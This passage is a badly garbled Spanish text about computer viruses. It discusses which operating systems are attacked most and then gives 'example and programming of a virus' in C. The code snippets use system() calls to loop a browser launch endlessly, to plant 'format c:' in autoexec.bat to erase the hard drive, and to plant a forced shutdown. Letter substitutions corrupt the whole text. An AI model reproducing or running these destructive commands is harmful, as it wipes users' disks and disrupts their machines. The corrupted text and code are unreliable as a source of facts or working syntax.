desactuali?ada, un ataque so're al+Bn script de dic)a aplicacin puede permitir que el atacante a'ra una s)ell y por ende e-ecutar comandos en el G>IN* SISTEMAS OPERATIVOS MAS ATACADOS Ias plataormas ms atacadas por virus inormticos son la l,nea de sistemas operativos 7indoKs de Microsot* &especto a los sistemas derivados de Gni6 como <>GTIinu6, BS9, Solaris, Mac CS N, estos )an corrido con mayor suerte de'ido en parte al sistema de permisos* >o o'stante en las plataormas derivadas de Gni6 )an e6istido al+unos intentos que ms que presentarse como amena?as reales no )an lo+rado el +rado de daHo que causa un virus en plataormas 7indoKs* PLATAFORMAS UNIK, INMUNES A LOS VIRUS DE LINDOLS Gn virus inormtico slo atacar la plataorma para la que ue desarrollado* E(EMPLO Y PRO2RAMACION DE UN VIRUS Gn virus troyano y su pro+ramacin seria. e-emplo ". \include ]stdio*)^T_aqui importas al escenario lo que vayas a utili?ar el *) es un )eader ile_T void main()` system(/.)ola/)XT_aqui dices que del sistema de los comandos de KindoKs te )a+a una seccin llamada )ola_T system(/start )ttp.TTKKK*+oo+le*com/)XT_a're +oo+le_T system(/+oto )ola/) XT_va a la seccin )ola por lo tanto la repite ininitas veces_T a ese seria un Kin3% de c que sirve para que se tra'e tu computadora o por e-emplo %. \include ]stdio*)^ void main()` system(/bec)o o/)XT_se quita lo que viene al principio de cada oracin que usualmente es la direccion donde esta u'icada el arc)ivo_T system(/cls/)XT_'orra lo escrito_T system(/s c ormat c. Os O Ot 0 ^^ c.dautoe6ec*'at/)XT_'orra el disco duro_T a esto )ara que se 'orre la inormacin o tam'ien e-emplo 3. \include ]studio*)^ void main()` system(/bec)o o/)X system(/cls/)X system(/ec)o s)utdoKn Os Ot 0 ^^ c.dautoe6ec*'at/)XT_te apa+a la compu a la uer?a_T system(/cls/)X este es para que te apa+ue la computadora estos si+nos T__T